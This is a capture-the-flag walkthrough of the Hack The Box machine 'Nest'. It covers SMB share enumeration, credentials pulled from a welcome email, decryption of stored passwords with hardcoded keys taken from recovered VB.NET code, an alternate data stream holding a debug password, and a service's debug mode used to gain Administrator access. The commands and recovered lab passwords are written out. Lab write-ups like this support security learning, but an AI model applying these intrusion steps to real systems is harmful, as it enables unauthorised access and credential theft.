Hackthebox – Nest
As with all targets, Nest is no exception to starting with several port scans. Below the output of the full port scan.
# root@kalivm:~/Nest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 10:09 CET
Nmap scan report for 10.10.10.178
Host is up (0.021s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://
nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=3/6%Time=5E621430%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\x
SF:20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\x
SF:20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20the
SF:\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---\
SF:r\n\r\nLIST\r\nSETDIR\x20\r\nRUNQUERY\x20\r\n
SF:DEBUG\x20\r\nHELP\x20So only port 445 and 4386 are open. The output is a bit scrambled so I decide to open port 4386 first in a web browser.
An unrecognized command and a session timeout, that did not help me much either. Therefore, the next vector is of course the SMB Server on port 445. First time to see if I can list all shares
root@kalivm:~/Nest# smbclient -L \\10.10.10.178 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup availableSo there are several shares which are listed and can potentially be opened. Time to continue the investigation on the Data directory.
root@kalivm:~/Nest# smbclient \\\\10.10.10.178\\Data -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
. D 0 Wed Aug 7 21:07:51 2019
.. D 0 Wed Aug 7 21:07:51 2019
Maintenance D 0 Wed Aug 7 21:07:32 2019
Templates D 0 Wed Aug 7 21:08:07 2019
\Shared\Maintenance
. D 0 Wed Aug 7 21:07:32 2019
.. D 0 Wed Aug 7 21:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 01:01:44 2019
\Shared\Templates
. D 0 Wed Aug 7 21:08:07 2019
.. D 0 Wed Aug 7 21:08:07 2019
HR D 0 Wed Aug 7 21:08:01 2019
Marketing D 0 Wed Aug 7 21:08:06 2019
\Shared\Templates\HR
. D 0 Wed Aug 7 21:08:01 2019
.. D 0 Wed Aug 7 21:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
\Shared\Templates\Marketing
. D 0 Wed Aug 7 21:08:06 2019
.. D 0 Wed Aug 7 21:08:06 2019A welcome e-mail, that might be interesting. Time to download that and see what its contents are
smb: \> get "Shared\Templates\HR\Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Shared\Templates\HR\Welcome Email.txt (4.8 KiloBytes/sec) (average 4.8 KiloBytes/sec)
smb: \> ^C
root@kalivm:~/smbdata# ls
smbdata smbdatalsl 'Welcome Email.txt'
root@kalivm:~/smbdata# cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff,
You will find your home folder in the following location:
\\HTB-NEST\Users\
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank youSo now we have a username and password. This might allow for more enumeration of the shares, so time to try it.
root@kalivm:~/Nest# smbclient -U TempUser \\\\10.10.10.178\\Data
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
\IT
. D 0 Thu Aug 8 00:58:07 2019
.. D 0 Thu Aug 8 00:58:07 2019
Archive D 0 Tue Aug 6 00:33:58 2019
Configs D 0 Thu Aug 8 00:59:34 2019
Installs D 0 Thu Aug 8 00:08:30 2019
Reports D 0 Sun Jan 26 01:09:13 2020
Tools D 0 Tue Aug 6 00:33:43 2019
---snip---
\IT\Configs
. D 0 Thu Aug 8 00:59:34 2019
.. D 0 Thu Aug 8 00:59:34 2019
Adobe D 0 Wed Aug 7 21:20:09 2019
Atlas D 0 Tue Aug 6 13:16:18 2019
DLink D 0 Tue Aug 6 15:25:27 2019
Microsoft D 0 Wed Aug 7 21:23:26 2019
NotepadPlusPlus D 0 Wed Aug 7 21:31:37 2019
RU Scanner D 0 Wed Aug 7 22:01:13 2019
Server Manager D 0 Tue Aug 6 15:25:19 2019
---snip---
\IT\Configs\NotepadPlusPlus
. D 0 Wed Aug 7 21:31:37 2019
.. D 0 Wed Aug 7 21:31:37 2019
config.xml A 6451 Thu Aug 8 01:01:25 2019
shortcuts.xml A 2108 Wed Aug 7 21:30:27 2019
\IT\Configs\RU Scanner
. D 0 Wed Aug 7 22:01:13 2019
.. D 0 Wed Aug 7 22:01:13 2019
RU_config.xml A 270 Thu Aug 8 21:49:37 2019Now this is where I spent quite some time looking through all the files. As I now got access to the IT share too, I was able to browse all the config files. The two worth mentioning were the RU Scanner and NotepadPlusPlus configuration files.
root@kalivm:~/Nest# cat RU_config.xml <?xml version="1.0"?> <ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>389 <Username>c.smith <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= </ConfigFile>root@kalivm:~/Nest# echo -n fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= | base64 -d }13=XJBAX*Wcf?βc
So I’ve found a username and password combination. But although this looked like a normal, valid Base64 string, it was not. The password got rejected. I have to continue the search and after a while, I find the config file for NotepadPlusPlus which contains some of the history of opened files which is rather interesting.
root@kalivm:~/Nest# cat config.xml
---snip---
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
---snip---So on the Secure$ Share, in the IT\Carl directory a file was opened. Time to see if I can access the same.
root@kalivm:~/Nest# smbclient -U TempUser \\\\10.10.10.178\\Secure$
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> ls IT\
NT_STATUS_ACCESS_DENIED listing \IT\Apparently, I am unable to list files in the IT directory. Trying to simply access the directory is a next step.
smb: \> cd IT\Carl
smb: \IT\Carl\> ls
. D 0 Wed Aug 7 21:42:14 2019
.. D 0 Wed Aug 7 21:42:14 2019
Docs D 0 Wed Aug 7 21:44:00 2019
Reports D 0 Tue Aug 6 15:45:40 2019
VB Projects D 0 Tue Aug 6 16:41:55 2019
10485247 blocks of size 4096. 6543698 blocks available
smb: \IT\Carl\> After just simply browsing to the IT\Carl directory, it appears that I am allowed to list directories in there and it shows several subdirectories. After some more browsing through the various directories, especially the ‘VB Projects’ directory, containing the RU_Scanner project for which I encountered a config file before appeared interesting. After downloading the project as a whole, I started to analyze the project, first looking at the Module1.vb file.
root@kalivm:~/RUScanner# cat Module1.vb
Module Module1
Sub Main()
Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
End Sub
End ModuleApparently this code is built to open the RU_Config file that I found earlier, and then decrypt the password string. This might be interesting so let’s take a look at the Utils.vb file.
root@kalivm:~/RUScanner# cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils
Public Shared Function GetLogFilePath() As String
Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
End Function
Public Shared Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function
---snip---So this contained a decryption function which decodes the RU_Config.xml file’s password hash apparently. Time to put this code in dotnetfiddle and see what it comes up with.
As can be seen, this decodes the string into the value ‘xRxRxPANCAK3SxRxRx’ which might be the password. Time to see if I can get Carl’s home directory to sync using a recursive smbget.
root@kalivm:~/Nest# smbget -rR smb://10.10.10.178/Users/c.smith -U c.smith
Password for [c.smith] connecting to //Users/10.10.10.178:
Using workgroup WORKGROUP, user c.smith
smb://10.10.10.178/Users/c.smith/HQK Reporting/AD Integration Module/HqkLdap.exe
smb://10.10.10.178/Users/c.smith/HQK Reporting/Debug Mode Password.txt
smb://10.10.10.178/Users/c.smith/HQK Reporting/HQK_Config_Backup.xml
smb://10.10.10.178/Users/c.smith/user.txt
Downloaded 17.27kB in 3 seconds
root@kalivm:~/Nest# ls c.smith
'HQK Reporting' user.txt
root@kalivm:~/Nest# cat user.txt
cf71b25<NOFLAG>4fd827e05f426e987So that worked and I have found the user flag. Now on to the root flag!
Privilege Escalation
Now with the previous ‘ls’ command, I thought it made me curious why the Debug Mode Password.txt file did not show up. So I went back to the SMB share to investigate.
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Fri Aug 9 01:06:12 AM 2019 CEST
access_time: Fri Aug 9 01:06:12 AM 2019 CEST
write_time: Fri Aug 9 01:08:17 AM 2019 CEST
change_time: Fri Aug 9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> So this info shows actually that there is an alternate data stream in the password file. Not sure what it’s useful for yet, but it might be interesting to find out what is in the alternate stream.
smb: \C.Smith\HQK Reporting\> get DEBUGM~1.txt:password
getting file \C.Smith\HQK Reporting\DEBUGM~1.txt:password of size 15 as DEBUGM~1.txt:password (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> ^C
root@kalivm:~/Nest# cat DEBUGM~1.txt:password
WBQ201953D8wAs I had not yet further investigated the high-port service yet, I decided to access it using netcat, but that did not give back any feedback apart from the first banner. Therefore, I tried to access it with ‘good ol’ telnet
root@kalivm:~/Nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>So this seemed to work, and there is a debug command that requires a password. This is where the previously found password may come in useful!
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>In debugmode, apparently the Service, Session and ShowQuery commands are added as options to be executed. Time to further analyze the behavior of all these functions.
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQKSo apparently, it is possible to change directories through the file system, since I came from the All Queries directory, I first try to look into the LDAP directory.
>setdir ldap
Current directory set to ldap
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: ldap
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=Here I see again the same HqkLdap.exe file which I have seen before as a project, and an administrator’s password hash that looks similar to the one from Carl I decoded previously. Time to check out the HqkLdap.exe file to see what it actually does.
After opening the HqkLdap.exe file using IlSpy, I notice a CR Class containing the DS function which seems to require an encrypted string. It might be worth trying this in dotnetfiddle again, but with the admin hash I just found.
So using dotnetfiddle, I slightly modified the code to provide the decrypted value as output. Now it is time to see if I can connect to the Users share with this password (XtH4nkS4Pl4y1nGX) and access the Administrators directory.
root@kalivm:~/Nest# smbclient -U Administrator \\\\10.10.10.178\\Users
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator\
smb: \Administrator\> ls
. D 0 Fri Aug 9 17:08:23 2019
.. D 0 Fri Aug 9 17:08:23 2019
flag.txt - Shortcut.lnk A 2384 Fri Aug 9 17:10:15 2019
10485247 blocks of size 4096. 6543627 blocks available
smb: \Administrator\> get "flag.txt - Shortcut.lnk"
getting file \Administrator\flag.txt - Shortcut.lnk of size 2384 as flag.txt - Shortcut.lnk (30.6 KiloBytes/sec) (average 30.6 KiloBytes/sec)
smb: \Administrator\> ^C
root@kalivm:~/Nest# cat flag.txt\ -\ Shortcut.lnk
L (
N (
NeK c>"\\HTB-NEST\C$Users\Administrator\Desktop\flag.txt-..\..\c$\Users\Administrator\Desktop\flag.txt)\\Htb-nest\c$\Users\Administrator\Desktop`Xhtb-nestG74Ȫ5
0
)
G74Ȫ5
0
)
SPS0%G`%
flag.txt-Text Document@@
N
K1SPSLXZJ ZDɬe*\\Htb-nest\c$\Users\Administrator\Desktop1SPSjc(=Oy3\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt
,!PCsg<;A1SPS0%G`% X
HTB-NEST-1SPS:7CD)-1SPSsC
COi܆3n
5\\Htb-nest\c$Microsoft NetworkDefault sharetOuUsersOu*6Users@shell32.dll,-21813`1O=ADMINI~1OmO=*6Administratorz1 OVbDesktopOm OVb*6:Desktop@shell32.dll,-21769V2 On flag.txOO:*wflag.txt\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt\\Htb-nest\c$\Users\Administrator\Desktop\flag.txtThat directory however, did only contain a shortcut to the actual flag, which was stored on C:\Users\Administrator\Desktop. Now since I have the administrator’s credentials, I might as well access the C$ Admin share and go through there.
root@kalivm:~/Nest# smbclient -U Administrator \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Boot DHS 0 Sat Jan 25 22:15:35 2020
bootmgr AHSR 383786 Sat Nov 20 05:40:08 2010
BOOTSECT.BAK AHSR 8192 Tue Aug 6 07:16:26 2019
Config.Msi DHS 0 Sat Jan 25 22:49:12 2020
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
pagefile.sys AHS 2146881536 Fri Mar 6 08:43:46 2020
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Thu Aug 8 01:40:50 2019
Program Files (x86) DR 0 Tue Jul 14 07:06:53 2009
ProgramData DH 0 Mon Aug 5 22:24:41 2019
Recovery DHS 0 Mon Aug 5 22:22:25 2019
restartsvc.bat A 33 Thu Aug 8 01:43:09 2019
Shares D 0 Tue Aug 6 15:59:55 2019
System Volume Information DHS 0 Tue Aug 6 06:17:38 2019
Users DR 0 Thu Aug 8 19:19:40 2019
Windows D 0 Fri Mar 6 09:37:08 2020
10485247 blocks of size 4096. 6543627 blocks availableBingo! All I have to do now, is got the the admin desktop and get the flag!
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Jan 26 08:20:50 2020
.. DR 0 Sun Jan 26 08:20:50 2020
desktop.ini AHS 282 Sat Jan 25 23:02:44 2020
root.txt A 32 Tue Aug 6 00:27:26 2019
10485247 blocks of size 4096. 6543627 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> ^C
root@kalivm:~/Nest# cat root.txt
6594c2e<NOFLAG>08a42f0b94b878c41
